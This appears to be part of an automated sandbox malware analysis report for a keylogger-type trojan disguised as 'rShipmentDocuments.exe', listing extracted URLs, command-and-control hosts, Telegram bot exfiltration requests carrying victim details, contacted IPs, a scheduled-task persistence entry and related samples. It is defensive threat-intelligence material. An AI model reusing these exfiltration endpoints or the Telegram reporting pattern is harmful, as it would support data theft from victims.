                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                  		unknown
                  http://checkip.dyndns.org/false
                  • URL Reputation: safe
                  		unknown
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                    		unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33false
                    • URL Reputation: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.fontbureau.com/designersGrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/?rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/bTherShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.telegram.orgrShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://api.telegram.org/botrShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    http://www.fontbureau.com/designers?rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.office.com/lBrShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003251000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://chrome.google.com/webstore?hl=enpZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003216000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://www.tiro.comrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042E6000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004334000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004409000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004190000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004142000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.goodfont.co.krrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://chrome.google.com/webstore?hl=enZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003225000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      http://varders.kozow.com:8081rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20arShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://www.sajatypeworks.comrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.typography.netDrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cn/cTherShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/staff/dennis.htmrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.office.com/pZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallrShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D42000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004192000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000043E4000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.000000000411D000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042EC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://checkip.dyndns.org/qrShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://chrome.google.com/webstore?hl=enlBrShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003220000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.galapagosdesign.com/DPleaserShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fonts.comrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sandoll.co.krrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.urwpp.deDPleaserShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.zhongyicts.com.cnrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerShipmentDocuments.exe, 00000000.00000002.1728733569.0000000003327000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1765638038.0000000002867000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sakkal.comrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000000.00000002.1732739844.0000000005DA4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030B2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.office.com/ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003256000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://www.apache.org/licenses/LICENSE-2.0rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://www.fontbureau.comrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://checkip.dyndns.orgrShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042E6000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004334000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004409000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004190000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004142000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://crl.microsoft.c62ZOlmYtPdlO.exe, 00000010.00000002.4153230560.00000000068E0000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://www.carterandcone.comlrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://aborters.duckdns.org:8081rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            http://www.fontbureau.com/designers/cabarga.htmlNrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-user.htmlrShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://51.38.247.67:8081/_send_.php?LrShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000031E3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://reallyfreegeoip.org/xml/8.46.123.33$rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003121000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030DC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://anotherarmy.dns.army:8081rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            http://www.jiyu-kobo.co.jp/rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://reallyfreegeoip.orgrShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003121000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers8rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesrShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D42000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004192000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000043E4000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.000000000411D000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042EC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedrShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmpfalseunknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            149.154.167.220
                            		api.telegram.orgUnited Kingdom
                            		62041TELEGRAMRUtrue
                            185.230.141.85
                            		unknownRussian Federation
                            		59504HostingvpsvilleruRUtrue
                            188.114.96.3
                            		reallyfreegeoip.orgEuropean Union
                            		13335CLOUDFLARENETUStrue
                            132.226.247.73
                            		checkip.dyndns.comUnited States
                            		16989UTMEMUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1531471
                            Start date and time:2024-10-11 09:34:20 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 10m 5s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:21
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:rShipmentDocuments.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@25/15@3/4
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 173
                            • Number of non-executed functions: 23
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            03:35:11API Interceptor8594808x Sleep call for process: rShipmentDocuments.exe modified
                            03:35:14API Interceptor33x Sleep call for process: powershell.exe modified
                            03:35:16API Interceptor6465190x Sleep call for process: ZOlmYtPdlO.exe modified
                            08:35:14Task SchedulerRun new task: ZOlmYtPdlO path: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            149.154.167.220z76ik.exeGet hashmaliciousMassLogger RATBrowse
                              LOI SPECIFIFCATION.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                New Purchase Order Ref#0012573.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  Swift Payment.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                    SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      up7bJYQosk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        XbER2eIAaa.exeGet hashmaliciousXWormBrowse
                                          SP0npSA64a.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            ZfzNdscQNj.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              GYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                185.230.141.85SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    188.114.96.3DRAFT DOC2406656.bat.exeGet hashmaliciousLokibotBrowse
                                                    • touxzw.ir/sirr/five/fre.php
                                                    lv961v43L3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                                                    10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                                    • www.airgame.store/ojib/
                                                    Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                    • www.cc101.pro/59fb/
                                                    octux.exe.exeGet hashmaliciousUnknownBrowse
                                                    • servicetelemetryserver.shop/api/index.php
                                                    bX8NyyjOFz.exeGet hashmaliciousFormBookBrowse
                                                    • www.rtprajalojago.live/2uvi/
                                                    lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                    • www.serverplay.live/71nl/
                                                    sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                    • www.cc101.pro/0r21/
                                                    E_receipt.vbsGet hashmaliciousUnknownBrowse
                                                    • paste.ee/d/VO2TX
                                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • filetransfer.io/data-package/fOmsJ2bL/download

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    reallyfreegeoip.orgz76ik.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 188.114.97.3
                                                    z51NEWPO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                    • 188.114.97.3
                                                    LOI SPECIFIFCATION.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.97.3
                                                    New Purchase Order Ref#0012573.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.96.3
                                                    Swift Payment.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 188.114.96.3
                                                    SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.96.3
                                                    up7bJYQosk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.96.3
                                                    SP0npSA64a.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.97.3
                                                    GYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.96.3
                                                    Vn2TyKMJUW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.97.3
                                                    checkip.dyndns.comz76ik.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 193.122.130.0
                                                    z51NEWPO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                    • 158.101.44.242
                                                    LOI SPECIFIFCATION.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 158.101.44.242
                                                    New Purchase Order Ref#0012573.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 193.122.130.0
                                                    Swift Payment.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 132.226.8.169
                                                    SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 193.122.6.168
                                                    up7bJYQosk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 193.122.130.0
                                                    SP0npSA64a.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 158.101.44.242
                                                    GYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 158.101.44.242
                                                    Vn2TyKMJUW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 132.226.8.169
                                                    api.telegram.orgz76ik.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 149.154.167.220
                                                    LOI SPECIFIFCATION.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    New Purchase Order Ref#0012573.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    Swift Payment.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 149.154.167.220
